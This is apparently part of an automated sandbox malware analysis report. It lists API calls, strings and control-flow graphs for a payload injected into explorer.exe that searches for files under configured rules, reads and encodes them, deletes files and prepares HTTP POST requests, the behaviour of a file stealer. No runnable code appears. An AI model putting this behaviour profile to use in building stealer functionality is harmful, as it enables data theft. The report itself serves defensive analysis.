                                                                                                                                      control_flow_graph 429 30c2240-30c2264 call 30c2066 432 30c230a-30c2310 429->432 433 30c226a-30c2283 FindFirstFileW 429->433 433->432 434 30c2289-30c2291 433->434 435 30c22a2-30c22af call 30c2099 434->435 436 30c2293-30c2299 434->436 440 30c22f1-30c2301 FindNextFileW 435->440 441 30c22b1-30c22b8 435->441 436->435 437 30c229b-30c229c 436->437 437->435 440->435 444 30c2303-30c2304 FindClose 440->444 442 30c22ba-30c22cc call 30c2066 441->442 443 30c22e0-30c22ea 441->443 442->440 448 30c22ce-30c22d9 call 30c2240 442->448 451 30c22eb call 30c3295 443->451 452 30c22eb call 30c2110 443->452 444->432 447 30c22ed-30c22ef 447->440 447->444 450 30c22de 448->450 450->440 451->447 452->447
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C2066: PathCombineW.SHLWAPI(?,033D3FE8,00000000,00000000,?,030C2262,030DBA98,?,00000000,033D3FE8), ref: 030C2088
                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,030DBA98,?,00000000,033D3FE8), ref: 030C2278
                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 030C22F9
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 030C2304
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$File$CloseCombineFirstNextPath
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2248441852-0
                                                                                                                                      • Opcode ID: f316f64bd51b9d29f0d9508eac49b21464a0748791f006bc4304c1d531372ea6
                                                                                                                                      • Instruction ID: 2ee15f2019f2fbc5eb8a85caa0fff83ff12e4ec552fa593065ec9c8aebc30db4
                                                                                                                                      • Opcode Fuzzy Hash: f316f64bd51b9d29f0d9508eac49b21464a0748791f006bc4304c1d531372ea6
                                                                                                                                      • Instruction Fuzzy Hash: 8D112431602259AACF20FB69DD48EFEF7FDAF94200F0805AEEC05D2454DF348A95CA94
                                                                                                                                      Function 030C1F82 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C11C4: VirtualQuery.KERNEL32(033D3FE8,030C1019,0000001C,030C1019,00000000,030C1CEB,?,?), ref: 030C11D1
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000001,00000363), ref: 030C1FA6
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000001), ref: 030C1FAF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1675517319-0
                                                                                                                                      • Opcode ID: 71e1d98cd2a2530b351418474a0b02026edc12848a436dc3c948f22b0c39fa8c
                                                                                                                                      • Instruction ID: cd6b76df7626c35c217ff847770fa3119cce679e28aebf6a2c9e2d2eaf18e20b
                                                                                                                                      • Opcode Fuzzy Hash: 71e1d98cd2a2530b351418474a0b02026edc12848a436dc3c948f22b0c39fa8c
                                                                                                                                      • Instruction Fuzzy Hash: AAE09235427390ABC668F770AC58A9E2BDCAB862A1F10852CF8158A0C7CB39844182A0
                                                                                                                                      Function 030C1D9B Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136sleepCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C1000: GetProcessHeap.KERNEL32(00000008,00000208,030C1AB2,?,?), ref: 030C1003
                                                                                                                                        • Part of subcall function 030C1000: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 030C100A
                                                                                                                                      • wsprintfA.USER32 ref: 030C1DF6
                                                                                                                                        • Part of subcall function 030C1185: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 030C118F
                                                                                                                                        • Part of subcall function 030C1185: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,00040745,030C1E0A), ref: 030C11A1
                                                                                                                                      • StrStrA.SHLWAPI(00000000,filesearch_rules=), ref: 030C1E1C
                                                                                                                                      • StrStrA.SHLWAPI(-00000011,|:|), ref: 030C1E35
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,-00000011,00000000), ref: 030C1E60
                                                                                                                                      • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 030C1E69
                                                                                                                                      • RtlZeroMemory.NTDLL(00000000,00000104), ref: 030C1E94
                                                                                                                                      • StrChrA.SHLWAPI(00000000,0000002C), ref: 030C1E9D
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 030C1EAE
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 030C1ED8
                                                                                                                                      • RtlZeroMemory.NTDLL(00040744), ref: 030C1F5B
                                                                                                                                      • RtlZeroMemory.NTDLL(00040744), ref: 030C1F6C
                                                                                                                                      • Sleep.KERNEL32(000927C0), ref: 030C1F77
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$MoveZero$FileHeap$AllocateComputeCrc32MappingOpenProcessSleepViewwsprintf
                                                                                                                                      • String ID: %s%s$filesearch_rules=$|:|
                                                                                                                                      • API String ID: 1853911042-3453313731
                                                                                                                                      • Opcode ID: b43ef6cb3e200dce3cc93e63aaa7b689868934f183745dddd75c265256cf5db5
                                                                                                                                      • Instruction ID: e143cc2b0cdd4f3fab148fbd91ac3bd40f888b232af5730322b68400370a450b
                                                                                                                                      • Opcode Fuzzy Hash: b43ef6cb3e200dce3cc93e63aaa7b689868934f183745dddd75c265256cf5db5
                                                                                                                                      • Instruction Fuzzy Hash: 2F41A574627381AFD314FF65EC88A2E7BE6EB85780714441CED015F28ADF789811CB61
                                                                                                                                      Function 030C2110 Relevance: 13.6, APIs: 9, Instructions: 109fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C2066: PathCombineW.SHLWAPI(?,033D3FE8,00000000,00000000,?,030C2262,030DBA98,?,00000000,033D3FE8), ref: 030C2088
                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?), ref: 030C2156
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 030C2162
                                                                                                                                      • _memset.LIBCMT ref: 030C217C
                                                                                                                                        • Part of subcall function 030C20C1: FindFirstFileW.KERNEL32(?,?), ref: 030C20D6
                                                                                                                                        • Part of subcall function 030C20C1: FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 030C20EE
                                                                                                                                        • Part of subcall function 030C20C1: FileTimeToDosDateTime.KERNEL32(?,?), ref: 030C20FD
                                                                                                                                        • Part of subcall function 030C20C1: FindClose.KERNEL32(00000000,?,?,?), ref: 030C2104
                                                                                                                                        • Part of subcall function 030C2018: lstrlenW.KERNEL32 ref: 030C2022
                                                                                                                                        • Part of subcall function 030C2018: _malloc.LIBCMT ref: 030C203F
                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?), ref: 030C21C6
                                                                                                                                      • _malloc.LIBCMT ref: 030C21D4
                                                                                                                                        • Part of subcall function 030CAE3B: __FF_MSGBANNER.LIBCMT ref: 030CAE52
                                                                                                                                        • Part of subcall function 030CAE3B: __NMSG_WRITE.LIBCMT ref: 030CAE59
                                                                                                                                        • Part of subcall function 030CAE3B: RtlAllocateHeap.NTDLL(033D0000,00000000,00000001), ref: 030CAE7E
                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,0000FFFF,?,00000000), ref: 030C21ED
                                                                                                                                      • _free.LIBCMT ref: 030C2212
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 030C2219
                                                                                                                                      • _free.LIBCMT ref: 030C222F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Time$Close$CreateFindHandle_free_malloc$AllocateCombineDateFirstHeapLocalPathRead_memsetlstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2641817564-0
                                                                                                                                      • Opcode ID: e438cb3ae2cfbb95b75cdf38b1583de5702c6bb82e893a01bf1ef25e5e4a68fe
                                                                                                                                      • Instruction ID: 9cceee276ca67effefa0152d7d8b8133f3224fd15d07b19a5763234924c556d3
                                                                                                                                      • Opcode Fuzzy Hash: e438cb3ae2cfbb95b75cdf38b1583de5702c6bb82e893a01bf1ef25e5e4a68fe
                                                                                                                                      • Instruction Fuzzy Hash: CC31E475612385ABCA20EB29DC48E9F77ECFFC9710F10492CFD55A7180EA34DA15CAA1
                                                                                                                                      Function 030C1342 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 227COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 174 30c1342-30c1394 call 30c1000 call 30c106c call 30c12b2 181 30c13af-30c13b2 174->181 182 30c1396-30c13ad 174->182 184 30c13b9-30c13bb 181->184 185 30c13bf-30c13c1 182->185 184->185 186 30c15df-30c15ee call 30c1011 185->186 187 30c13c7-30c13fe RtlZeroMemory 185->187 191 30c1404-30c1429 187->191 192 30c15d7 187->192 191->192 195 30c142f-30c1489 call 30c10d4 191->195 194 30c15de 192->194 194->186 199 30c148f-30c1494 195->199 200 30c15c9-30c15d3 195->200 201 30c14ae-30c14d6 call 30c1000 wsprintfW 199->201 202 30c1496-30c14a7 199->202 200->192 206 30c14ef-30c1518 201->206 207 30c14d8-30c14da 201->207 202->201 214 30c151e-30c152e 206->214 215 30c15bb-30c15c4 call 30c1011 206->215 208 30c14db-30c14de 207->208 209 30c14e9-30c14eb 208->209 210 30c14e0-30c14e5 208->210 209->206 210->208 212 30c14e7 210->212 212->206 214->215 218 30c1534-30c154a call 30c1000 214->218 215->200 222 30c154c-30c1557 218->222 223 30c1559-30c1564 call 30c102f 222->223 224 30c1566-30c1581 222->224 223->224 228 30c1585-30c158f 224->228 229 30c1583 224->229 228->222 230 30c1591-30c1595 228->230 229->228 231 30c15ac-30c15b7 call 30c1011 230->231 232 30c1597 call 30c104c 230->232 231->215 235 30c159c-30c15a6 RtlMoveMemory 232->235 235->231
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C1000: GetProcessHeap.KERNEL32(00000008,00000208,030C1AB2,?,?), ref: 030C1003
                                                                                                                                        • Part of subcall function 030C1000: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 030C100A
                                                                                                                                        • Part of subcall function 030C106C: lstrlen.KERNEL32 ref: 030C1074
                                                                                                                                        • Part of subcall function 030C106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001), ref: 030C1086
                                                                                                                                        • Part of subcall function 030C12B2: RtlZeroMemory.NTDLL(?,00000018), ref: 030C12C4
                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 030C13D1
                                                                                                                                      • wsprintfW.USER32 ref: 030C14C8
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 030C15A6
                                                                                                                                      Strings
                                                                                                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 030C150A
                                                                                                                                      • Accept: */*Referer: %S, xrefs: 030C14BE
                                                                                                                                      • POST, xrefs: 030C1476
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                      • API String ID: 3833683434-704803497
                                                                                                                                      • Opcode ID: f633c9ce83a800dc79abd365651df1994c075575c95e0c8dafc2628ce7be00cf
                                                                                                                                      • Instruction ID: 774b565f9cd9ba8ef9834e8501ef7be0d31701f50fc54be089ba357dfcee4ffe
                                                                                                                                      • Opcode Fuzzy Hash: f633c9ce83a800dc79abd365651df1994c075575c95e0c8dafc2628ce7be00cf
                                                                                                                                      • Instruction Fuzzy Hash: 6E81997520A381AFD714EF69C884A6FBBE9FF89244F14092DF946C7292DB74C900CB52
                                                                                                                                      Function 030E5AEA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 199COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 237 30e5aea-30e5af2 238 30e5b4b-30e5b51 237->238 239 30e5af5-30e5af7 237->239 240 30e5b56-30e5b58 238->240 239->240 241 30e5af9 239->241 243 30e5b6a-30e5b6f 240->243 241->238 244 30e5b71 243->244 245 30e5b73 244->245 246 30e5b60-30e5b65 244->246 248 30e5b78-30e5b7a 245->248 247 30e5b66-30e5b68 246->247 247->243 247->244 249 30e5b7c-30e5b81 248->249 250 30e5b83-30e5b87 248->250 249->250 250->248 251 30e5b89 250->251 252 30e5b8b-30e5b92 251->252 253 30e5b94-30e5b99 251->253 252->248 252->253 254 30e5b9b-30e5ba4 253->254 255 30e5ba8-30e5baa 253->255 256 30e5c1a-30e5c1d 254->256 257 30e5ba6 254->257 258 30e5bac-30e5bb1 255->258 259 30e5bb3-30e5bb7 255->259 262 30e5c22-30e5c25 256->262 257->255 258->259 260 30e5bb9-30e5bbe 259->260 261 30e5bc0-30e5bc2 259->261 260->261 263 30e5be4-30e5bf3 261->263 264 30e5bc4 261->264 265 30e5c27-30e5c29 262->265 266 30e5c04-30e5c11 263->266 267 30e5bf5-30e5bfc 263->267 268 30e5bc5-30e5bc7 264->268 265->262 269 30e5c2b-30e5c2e 265->269 266->266 272 30e5c13-30e5c15 266->272 267->267 271 30e5bfe 267->271 273 30e5bc9-30e5bce 268->273 274 30e5bd0-30e5bd4 268->274 269->262 270 30e5c30-30e5c4c 269->270 270->265 275 30e5c4e 270->275 271->247 272->247 273->274 274->268 276 30e5bd6 274->276 277 30e5c54-30e5c58 275->277 278 30e5bd8-30e5bdf 276->278 279 30e5be1 276->279 280 30e5c5a-30e5c70 277->280 281 30e5c96-30e5c99 277->281 278->268 278->279 279->263 287 30e5c71-30e5c76 280->287 282 30e5c9c-30e5ca3 281->282 284 30e5cc7-30e5cf7 VirtualProtect * 2 282->284 285 30e5ca5-30e5ca7 282->285 286 30e5cfb-30e5cff 284->286 288 30e5cba-30e5cc5 285->288 289 30e5ca9-30e5cb8 285->289 286->286 290 30e5d01 286->290 287->277 291 30e5c78-30e5c87 287->291 288->289 289->282 293 30e5c89-30e5c8e 291->293 294 30e5c90-30e5c93 291->294 293->287
                                                                                                                                      Strings
                                                                                                                                      • to initialize the CRT more than once.This indicates a bug in your application., xrefs: 030E5B4C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030E3000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30e3000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: to initialize the CRT more than once.This indicates a bug in your application.
                                                                                                                                      • API String ID: 0-2233211119
                                                                                                                                      • Opcode ID: 21bc480e10ff5060338bbbfd81e1a0136e81fd4fa35cdbb5a6e910d2053669de
                                                                                                                                      • Instruction ID: d75bb23d1d3da989a296f04b02f35cfd3738348f4ea22c0e5ecff1e95e59e667
                                                                                                                                      • Opcode Fuzzy Hash: 21bc480e10ff5060338bbbfd81e1a0136e81fd4fa35cdbb5a6e910d2053669de
                                                                                                                                      • Instruction Fuzzy Hash: 0F512871B063515FD720CA78CCD06A5B7D4EB43229B1C0F79D5E1CB3C2E7A4940A87A4
                                                                                                                                      Function 030C32B9 Relevance: 4.9, APIs: 3, Instructions: 389COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 295 30c32b9-30c32cd 296 30c32cf-30c32d2 295->296 297 30c32d7-30c32db 295->297 298 30c3714-30c371a 296->298 299 30c32dd-30c32e2 call 30c329f 297->299 300 30c32e4-30c32f3 297->300 299->300 301 30c332b-30c333d call 30c3b59 300->301 302 30c32f5-30c32fe 300->302 310 30c337c-30c339e call 30c23a8 301->310 311 30c333f-30c3344 301->311 308 30c3308-30c330e 302->308 309 30c3300-30c3305 302->309 313 30c3318-30c331f 308->313 314 30c3310-30c3316 308->314 309->308 319 30c33a0 310->319 320 30c33c2-30c33e8 call 30c3b59 call 30c2451 310->320 311->310 315 30c3346-30c3349 311->315 317 30c3325-30c3328 313->317 314->313 314->317 318 30c334b-30c334d 315->318 317->301 321 30c334f-30c3352 318->321 322 30c3370-30c337a 318->322 324 30c33ab 319->324 325 30c33a2-30c33a7 319->325 335 30c33ee-30c3401 call 30c2451 320->335 336 30c3695-30c369a 320->336 321->322 323 30c3354-30c3361 call 30c390e 321->323 322->310 322->318 331 30c3364-30c336d 323->331 328 30c33ae-30c33b4 324->328 325->320 327 30c33a9 325->327 327->328 328->320 332 30c33b6-30c33bc 328->332 331->322 332->320 334 30c3574-30c3576 332->334 334->336 337 30c357c-30c3592 call 30c2451 334->337 335->336 348 30c3407-30c3419 call 30c2451 335->348 339 30c369c-30c36a3 call 30cadb0 336->339 340 30c36a6-30c36a8 336->340 337->336 351 30c3598-30c35b2 call 30c2451 337->351 339->340 345 30c36aa-30c36ba call 30c2451 340->345 346 30c36e5 340->346 352 30c36bf-30c36c3 345->352 349 30c36e8-30c36f3 346->349 348->336 361 30c341f-30c3432 call 30c2451 348->361 362 30c36fa-30c3702 349->362 363 30c36f5-30c36f7 349->363 351->336 359 30c35b8-30c35d2 call 30c2451 351->359 352->346 355 30c36c5-30c36c8 352->355 355->346 360 30c36ca-30c36e3 355->360 359->336 374 30c35d8-30c35e3 359->374 360->349 361->336 375 30c3438-30c344f call 30c2451 361->375 366 30c370b-30c370c call 30c88fa 362->366 367 30c3704-30c370a call 30c88fa 362->367 363->362 373 30c3711-30c3712 366->373 367->366 373->298 377 30c35fa-30c35fc 374->377 378 30c35e5-30c35eb 374->378 375->336 384 30c3455-30c346c call 30c2451 375->384 381 30c35fd-30c360c call 30c2451 377->381 378->377 380 30c35ed-30c35f8 378->380 380->381 381->336 388 30c3612-30c3618 381->388 384->336 389 30c3472-30c348e call 30c2451 384->389 390 30c361a-30c3624 388->390 391 30c3634-30c3637 388->391 389->336 398 30c3494-30c34b0 call 30c2451 389->398 390->391 393 30c3626-30c3632 390->393 394 30c363c-30c364a call 30c2451 391->394 393->394 394->336 399 30c364c-30c3660 call 30c2451 394->399 398->336 404 30c34b6-30c34ca call 30c2451 398->404 399->336 405 30c3662-30c367a 399->405 404->336 411 30c34d0-30c34f4 call 30c2451 404->411 407 30c367c-30c3680 405->407 408 30c3682 405->408 407->408 410 30c3685-30c368e call 30c2451 407->410 408->410 414 30c3693 410->414 411->336 416 30c34fa-30c3510 call 30c2451 411->416 414->336 416->336 419 30c3516-30c352d call 30c2451 416->419 419->336 422 30c3533-30c3557 call 30c2451 419->422 422->336 425 30c355d-30c3572 call 30c2451 422->425 425->334
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 136ab7899a87cf6f1173380ee5e717d99eb8f284b58f0559d8126294b22d9cbe
                                                                                                                                      • Instruction ID: 09e22eeba841edca59f80a22b596de58f41119d11fb6a71d8b64b63e102612a0
                                                                                                                                      • Opcode Fuzzy Hash: 136ab7899a87cf6f1173380ee5e717d99eb8f284b58f0559d8126294b22d9cbe
                                                                                                                                      • Instruction Fuzzy Hash: 33D1EB79622B419BCB71DF28C544BAFB3EAEF84750B14895CE69A5B780DF34E8418B10
                                                                                                                                      Function 030C37B0 Relevance: 4.6, APIs: 3, Instructions: 57fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 453 30c37b0-30c37d7 call 30c371d 456 30c37d9-30c37dc 453->456 457 30c37f5-30c3800 call 30c3774 453->457 456->457 458 30c37de-30c37f3 CreateFileW 456->458 461 30c382e-30c3834 457->461 462 30c3802-30c3806 457->462 458->457 463 30c382c 462->463 464 30c3808-30c3829 call 30cd44c call 30cae3b wcsncpy 462->464 463->461 464->463
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFile_mallocwcsncpy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 394119516-0
                                                                                                                                      • Opcode ID: dca97c5332efca55d76623fc1a039b9346291ea93d47d35607d11964aafa900b
                                                                                                                                      • Instruction ID: 3798fca96a218fdba8f0a8a6cd49915aa27fc74a73ea6d928271184b097854d1
                                                                                                                                      • Opcode Fuzzy Hash: dca97c5332efca55d76623fc1a039b9346291ea93d47d35607d11964aafa900b
                                                                                                                                      • Instruction Fuzzy Hash: 3411707A912259BBCF20EBA5CC48DDFFBBDFF49250B0485A9A51497100DB359614CBE0
                                                                                                                                      Function 030C16EA Relevance: 4.5, APIs: 3, Instructions: 47fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,E8014E8D), ref: 030C1704
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,E8014E8D), ref: 030C1754
                                                                                                                                      • DeleteFileW.KERNEL32(00000000), ref: 030C175B
                                                                                                                                        • Part of subcall function 030C1221: CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 030C123B
                                                                                                                                        • Part of subcall function 030C1221: CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 030C125B
                                                                                                                                        • Part of subcall function 030C15F1: lstrlen.KERNEL32(?), ref: 030C1608
                                                                                                                                        • Part of subcall function 030C15F1: lstrcat.KERNEL32(00000002,033F852B), ref: 030C163A
                                                                                                                                        • Part of subcall function 030C15F1: lstrcat.KERNEL32(0000004E,?), ref: 030C1656
                                                                                                                                        • Part of subcall function 030C105D: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 030C1065
                                                                                                                                        • Part of subcall function 030C1011: GetProcessHeap.KERNEL32(00000000,033D3FE8,00000000,030C1CEB,?,?), ref: 030C1020
                                                                                                                                        • Part of subcall function 030C1011: RtlFreeHeap.NTDLL(00000000,?,?), ref: 030C1027
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: BinaryCryptFileFreeHeapStringlstrcat$CloseDeleteHandleProcessReadVirtuallstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2581074353-0
                                                                                                                                      • Opcode ID: f4e5a8dda59ed339abe186aaaf881b8bfc1cff3eaebe1023a5bf97cb907cdc74
                                                                                                                                      • Instruction ID: 3c6ec8dcb280a865b25a55fcc3d8fe100f421f2a1874865af65edfb4d6c3e98f
                                                                                                                                      • Opcode Fuzzy Hash: f4e5a8dda59ed339abe186aaaf881b8bfc1cff3eaebe1023a5bf97cb907cdc74
                                                                                                                                      • Instruction Fuzzy Hash: B1014E3A7232805BC71CEB31AC549BF7B9DCFD2211B14051CEC028A143DE2DC40987E1
                                                                                                                                      Function 030C176F Relevance: 4.5, APIs: 3, Instructions: 25stringCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 483 30c176f-30c177e 484 30c17b4-30c17b8 483->484 485 30c1780-30c17ae RtlZeroMemory lstrlenW SHFileOperationW 483->485 485->484
                                                                                                                                      APIs
                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000001E), ref: 030C1786
                                                                                                                                      • lstrlenW.KERNEL32(033D3FE8), ref: 030C1794
                                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 030C17AE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileMemoryOperationZerolstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2791248854-0
                                                                                                                                      • Opcode ID: aea8685c03e6404f5ccf3fd3f0bb6c272cdca0cdc2f606ea4ce22bdead8fdcf8
                                                                                                                                      • Instruction ID: adba008adeb5911d84fe6308865f4d594625c9e57c8342e4ccb8388e2fce061b
                                                                                                                                      • Opcode Fuzzy Hash: aea8685c03e6404f5ccf3fd3f0bb6c272cdca0cdc2f606ea4ce22bdead8fdcf8
                                                                                                                                      • Instruction Fuzzy Hash: 6FF0C0718132189BDB11EF98D9497DEB7FCEB0D705F000156ED05AB144D77969208BE5
                                                                                                                                      Function 030C1041 Relevance: 3.8, APIs: 3, Instructions: 36memorystringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000), ref: 030C1056
                                                                                                                                      • lstrlen.KERNEL32(?,00000000,00000000,?,00000025,030C1C25,?,?), ref: 030C109D
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,00000025,030C1C25,?,?), ref: 030C10BA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocByteCharMultiVirtualWidelstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1936347974-0
                                                                                                                                      • Opcode ID: b8c23af5acfebe8b942ba4e0a1ebb1198e458300b02cec315c3cc44fd9d76091
                                                                                                                                      • Instruction ID: d2e0e87bf312aa83d3563facaa139ef1a8efa247e1239660bd7d4b418d261abe
                                                                                                                                      • Opcode Fuzzy Hash: b8c23af5acfebe8b942ba4e0a1ebb1198e458300b02cec315c3cc44fd9d76091
                                                                                                                                      • Instruction Fuzzy Hash: BCF027353132827AEA086B265C4CF9F2F5CDBC1746F200018B9019A042CAD4680545A0
                                                                                                                                      Function 030C27A9 Relevance: 3.4, APIs: 2, Instructions: 421COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
